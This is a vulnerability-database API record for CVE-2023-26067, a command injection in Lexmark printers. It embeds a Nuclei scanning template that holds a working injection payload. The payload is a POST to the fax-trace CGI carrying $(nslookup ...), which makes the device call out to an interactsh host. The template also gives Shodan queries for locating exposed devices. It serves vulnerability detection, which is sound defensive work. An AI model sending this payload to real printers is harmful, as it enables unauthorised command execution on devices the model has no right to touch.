{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-26067/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-26067/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-26067/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-26067/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-26067/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-26067"},"sightings":{"href":"/api/v1/sightings/cve-2023-26067"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-26067.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2023-26067\n\ninfo:\n  name: Lexmark Printers - Command Injection\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.\n  remediation: |\n    Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability.\n  reference:\n    - https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/\n    - https://github.com/horizon3ai/CVE-2023-26067\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-26067\n    - https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf\n    - https://support.lexmark.com/alerts/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.1\n    cve-id: CVE-2023-26067\n    cwe-id: CWE-20\n    epss-score: 0.37835\n    epss-percentile: 0.98495\n    cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: lexmark\n    product: cxtpc_firmware\n    shodan-query:\n      - \"Server: Lexmark_Web_Server\"\n      - \"server: lexmark_web_server\"\n  tags: cve2023,cve,printer,iot,lexmark,vkev,intrusive,vuln\nvariables:\n  cmd: 'nslookup {{interactsh-url}}'\n\nhttp:\n  - raw:\n      - |\n        POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1\n        Host: {{Hostname}}\n        Accept-Encoding: gzip, deflate\n        Content-Length: 49\n\n        FT_Custom_lbtrace=$({{cmd}})\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(interactsh_protocol, 'dns')\n          - contains(body, 'Fax Trace Settings')\n          - status_code == 200\n        condition: and\n# digest: 4b0a0048304602210091e836d3675af72adc90a46c62da99a2049e93a2b82fe6b5bc490c3f91b4f4ef0221009e2bbdab13ae521810181e012be99680358397653d546c8d8782ac9a97be251d:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-26067"}